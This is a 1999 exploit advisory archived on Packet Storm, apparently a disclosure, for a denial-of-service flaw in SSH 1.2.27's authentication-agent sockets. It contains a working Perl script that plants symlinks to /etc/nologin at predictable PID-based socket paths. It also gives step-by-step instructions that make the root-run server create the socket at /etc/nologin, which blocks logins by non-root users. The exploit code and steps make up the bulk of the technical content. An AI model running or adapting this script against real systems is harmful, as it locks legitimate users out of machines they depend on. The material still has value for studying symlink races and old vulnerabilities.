exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

SSH.1.2.27.DOS.txt

SSH.1.2.27.DOS.txt
Posted Sep 28, 1999

SSH has the option of setting up "authentication sockets", used to pass authentication keys securely. When this is used, a socket is created on both client and server machines; the socket created on the server uses an often easy to guess filename (based on the PID)...

tags | exploit
SHA-256 | 75491b9d176b71151fc9e9366f1486cb0fe9a8525c93ee0c5a2c52acb43f9ff4

SSH.1.2.27.DOS.txt

Change Mirror Download
- SSH 1.2.27 DOS:
o SSH has the option of setting up "authentication sockets", used to
pass authentication keys securely. When this is used, a socket is
created on both client and server machines; the socket created on the
server uses an often easy to guess filename (based on the PID)...
The creation of this socket is done while the server is acting as
root and does follow symlinks.

exploit:

- connect to remote machine
- run following script (creates symlinks for the next 50 PID's):

#!/usr/bin/perl

$pid = $$;

$whoami = `whoami`;
chop($whoami);
mkdir("/tmp/ssh-$whoami", 0700);

for ($i = $pid; $i < $pid+50; $i++) {
symlink("/etc/nologin", "/tmp/ssh-$whoami/ssh-$i-agent");
}


- on local machine, execute ssh-agent1; it will produce a few lines
to cut and paste into your shell. Do so.

- ssh1 to the remote machine; enter password

The socket will have been created at /etc/nologin, preventing other
non-root users from logging in. This connection too will die with
"Logins are currently denied by /etc/nologin:"

This was tested on a RedHat 6.0 machine, with standard
configure/make/install installation of ssh. This script should work
pretty well for systems that create processes where each PID is one
greater than the last; other platforms may require modifications, or
many many more links, if they're exploitable.

I sent this info in to the ssh folks a while ago and they were looking
into it; haven't heard from them in over a week though.

Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    48 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close